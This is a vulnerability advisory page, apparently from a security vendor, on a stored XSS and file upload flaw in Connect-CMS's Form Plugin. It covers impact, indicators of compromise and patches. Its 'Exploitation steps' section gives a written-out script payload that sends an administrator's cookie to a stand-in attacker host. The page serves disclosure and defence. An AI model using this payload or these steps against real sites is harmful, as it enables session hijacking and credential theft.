CVE-2026-32278: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-32278 is a Stored Cross-Site Scripting (XSS) vulnerability in the file field of the Form Plugin in Connect-CMS, an open-source content management system developed by opensource-workshop. The vulnerability affects all 1.x series versions up to and including 1.41.0, and all 2.x series versions up to and including 2.41.0. It was disclosed on March 23, 2026, with patches released the same day. The GitHub Advisory Database rates this vulnerability as High severity with a CVSS v3.1 score of 8.2 (Github Advisory, Security Advisory).

Technical details

The vulnerability is rooted in two weaknesses: CWE-434 (Unrestricted Upload of File with Dangerous Type) and CWE-79 (Stored Cross-Site Scripting). Prior to the patch, the Form Plugin's file field did not enforce restrictions on uploaded file types or validate file extensions and MIME types, allowing an attacker to upload files with dangerous types (e.g., HTML files containing JavaScript). The patch commit (9d87fe8) reveals that the fix involved removing .html from the list of allowed file extensions in the upload controller, adding custom validation rules (CustomValiUploadExtensions, CustomValiUploadMimetypes) for file uploads, and introducing per-column file extension and size restrictions (Security Advisory, Patch Commit). Exploitation requires network access and user interaction (an administrator viewing the uploaded content), but no privileges are required to submit the malicious file through the form.

Impact

If exploited, arbitrary scripts stored via the malicious file upload execute in an administrator's browser when they view the affected form submission, potentially leading to session hijacking, credential theft, and unauthorized administrative actions. The vulnerability has a changed scope, meaning the impact extends beyond the vulnerable component itself to the broader application and its users. High confidentiality and integrity impacts are assessed, as an attacker could exfiltrate sensitive data or manipulate CMS content and settings through the compromised administrator session (Github Advisory, Security Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (Github Advisory). The EPSS score is approximately 0.038–0.051%, placing it in the 16th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified. The vulnerability was responsibly disclosed by Sho Odagiri of GMO Cybersecurity by Ierae, Inc. (Security Advisory).

Exploitation steps

  1. Identify a target: Locate a Connect-CMS instance running version 1.41.0 or earlier (1.x branch) or 2.41.0 or earlier (2.x branch) that has a publicly accessible form using the Form Plugin with a file upload field.
  2. Craft a malicious file: Create an HTML file (e.g., payload.html) containing a JavaScript payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>, designed to exfiltrate the administrator's session cookie.
  3. Submit the file via the form: Upload the crafted HTML file through the vulnerable file field in the Form Plugin. Prior to the patch, .html files were permitted and no MIME type validation was enforced, allowing the file to be stored on the server.
  4. Wait for administrator review: The stored XSS payload executes when an administrator views the form submission in the CMS backend, triggering the malicious script in their browser context.
  5. Achieve objective: The attacker receives the administrator's session token or other sensitive data, enabling session hijacking, unauthorized CMS modifications, or further lateral movement within the application (Security Advisory, Patch Commit).

Indicators of compromise

  • Network: Outbound HTTP requests from the CMS server or administrator's browser to unexpected external domains shortly after an administrator reviews form submissions; unusual GET requests containing cookie or session data in query parameters to attacker-controlled infrastructure.
  • File System: Presence of .html or other non-standard file types in the Connect-CMS uploads directory (e.g., storage/app/uploads/) that contain JavaScript or HTML content rather than expected document types.
  • Logs: Web server access logs showing uploads of .html files to the forms upload endpoint; CMS application logs recording file submissions with unexpected MIME types or extensions prior to the patch being applied.
  • Process/Session: Unexpected administrator account activity (e.g., configuration changes, new user creation) following form submission review, which may indicate session hijacking via the stored XSS payload.

Mitigation and workarounds

The primary remediation is to upgrade Connect-CMS to the patched versions: 1.41.1 for the 1.x branch or 2.41.1 for the 2.x branch, both released on March 23, 2026 (v1.41.1 Release, v2.41.1 Release). As a temporary workaround prior to patching, administrators should disable or restrict access to any forms using the file upload field type, or implement a Content Security Policy (CSP) to limit script execution. Additionally, restricting allowed file upload extensions at the web server or application firewall level (blocking .html and other executable types) can reduce risk until the patch is applied (Security Advisory).

Community reactions

The vulnerability was reported by Sho Odagiri of GMO Cybersecurity by Ierae, Inc. and acknowledged by the Connect-CMS maintainers (opensource-workshop) in the official security advisory (Security Advisory). Social media activity was limited to automated CVE tracking accounts on Mastodon and Bluesky shortly after disclosure, with no notable independent researcher commentary or significant media coverage identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management